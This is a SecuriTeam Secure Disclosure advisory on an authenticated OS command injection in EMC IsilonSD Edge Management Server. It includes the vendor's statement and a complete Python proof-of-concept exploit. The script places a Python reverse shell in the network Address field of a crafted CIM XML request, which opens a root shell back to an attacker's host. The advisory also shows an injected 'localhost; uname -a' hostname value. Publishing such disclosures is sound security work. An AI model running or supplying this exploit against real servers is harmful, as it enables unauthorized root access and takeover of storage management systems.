SSD Advisory – EMC IsilonSD Edge Management Server Command Injection

Vulnerability Summary
The following advisory describes a Remote Command Injection vulnerability found in EMC IsilonSD Edge Management Server version 1.0.1.0005.
IsilonSD Edge Management Server enables you to deploy industry leading scale-out NAS operating system using industry-standard hardware. Key benefits of IsilonSD Edge: Simple yet powerful and efficient scale-out storage solution for remote and branch offices, Easily extends your enterprise data lake from the core data center to edge locations and Enables consolidation and distribution of unstructured data
Credit
An independent security researcher, Nahuel D. Sánchez from vvvSecurity, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
We have informed EMC of the vulnerability on the 24th of April 2017.
The vendor has sent the following statement in response to this advisory:
Dell EMC recently became aware of a potential vulnerability that was disclosed regarding EMC IsilonSD Management Server by third-party researchers. IsilonSD Management Server is a gateway for deploying virtual OneFS clusters on VMware ESXi. Note: IsilonSD Management Server is NOT used for deploying physical OneFS clusters.
Based on the current design of the product, we believe the reported issue does not add any additional security risk to the customer environment. The reported flaw does exist but exploitation of the vulnerability requires a privilege that is considered normal operating privilege and that should be highly protected in any Isilon deployment.
Below are our findings after initial review of the reported issue:

  • The attacker requires the knowledge of the password for IsilonSD Management Server administrator to exploit the issue described in the report
  • The authenticated user can then run OS commands via the reported web interface flaw on the virtual OS where IsilonSD Management Server is deployed. This issue does not allow remote code execution on the virtual OneFS clusters.
  • IsilonSD Management Server administrator user is considered highly privileged user and has full access to the underlying virtual OS as part of the product design. The access to the IsilonSD Management Server (including the web interface) and administrative user credentials should be given to trusted users only. Any default credentials should be also changed as part of the best practice recommendations. Please see IsilonSD Edge with IsilonSD Management Server Installation and Administration Guide for more information.

Dell EMC continuously reviews the product design for IsilonSD Management Server to identify potential areas of improvements to raise the overall security posture of the product.

Vulnerability Details
A remote authenticated attacker can misuse IsilonSD management tools (located at https://:5480) to execute arbitrary OS commands. The vulnerability relies in the lack of backend validation when the network configuration if performed. There is some kind of front end validation which can be bypassed.
If an attacker access the application and changes the hostname to something like “localhost; uname -a” the “uname -a” command will be executed with root privileges.
Proof of Concept
Reverse shell with root privileges will be triggered by this PoC.
Execute the PoC as follows:
python os_command_injection.py https://:5480 administrator
os_command_injection.py

import requests
import sys
from requests.auth import HTTPBasicAuth
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) <> 6:
    print "usage script.py <target_url> <attacker_host> <attacker_port> <username> <password>"
    exit()
target_url = sys.argv[1]
attacker_host = sys.argv[2]
attacker_port = sys.argv[3]
username = sys.argv[4]
password = sys.argv[5]
headers = {"Content-Type":"application/xml; charset=UTF-8", "Cache-Control": "no-cache", "CIMProtocolVersion": "1.0", "CIMOperation": "MethodCall", "CIMMethod": "%53%65%74%564%41%6E%64%566%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67", "CIMObject": "%72%6F%6F%74/%63%69%6D%762%3A%56%41%4D%49_%4E%65%74%77%6F%72%6B%53%65%74%74%69%6E%67.%4E%61%6D%65%3D%22%65%74%680%22%2C%53%65%72%76%65%72%4E%61%6D%65%3D%22%6C%6F%63%61%6C%68%6F%73%74%22"}
shellcode = '''python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' % (attacker_host, attacker_port)
payload = '''<?xml version="1.0" encoding="UTF-8"?>
<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="11" PROTOCOLVERSION="1.0"><SIMPLEREQ><METHODCALL NAME="SetV4AndV6NetworkSetting"><LOCALINSTANCEPATH><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH><INSTANCENAME CLASSNAME="VAMI_NetworkSetting"><KEYBINDING NAME="Name"><KEYVALUE VALUETYPE="string">eth0</KEYVALUE></KEYBINDING><KEYBINDING NAME="ServerName"><KEYVALUE VALUETYPE="string">localhost</KEYVALUE></KEYBINDING></INSTANCENAME></LOCALINSTANCEPATH><PARAMVALUE NAME="Address" PARAMTYPE="string"><VALUE>192.168.1.162; %s</VALUE></PARAMVALUE><PARAMVALUE NAME="GatewayV4" PARAMTYPE="string"><VALUE>192.168.1.1</VALUE></PARAMVALUE><PARAMVALUE NAME="SubnetMask" PARAMTYPE="string"><VALUE>255.255.255.0</VALUE></PARAMVALUE><PARAMVALUE NAME="AddressVersions" PARAMTYPE="string"><VALUE>STATICV4+AUTOV6</VALUE></PARAMVALUE></METHODCALL></SIMPLEREQ></MESSAGE></CIM>''' % shellcode
try:
    print "Launching exploit against %s" % target_url
    print "Expecting to receive a reversel shell on host %s port %s" % (attacker_host, attacker_port)
    print "After a few seconds check your netcat..."
    res = requests.post(target_url + "/cimom", auth=(username, password), data=payload, headers=headers, verify=False)
    if res.status_code == 401:
        print "Invalid credentials were specified"
    elif res.status_code <> 200:
        print "There was an error..."
        print res.status_code
        print res.reason
except Exception as e:
    print "There was an error..."
    print e

?

Get in touch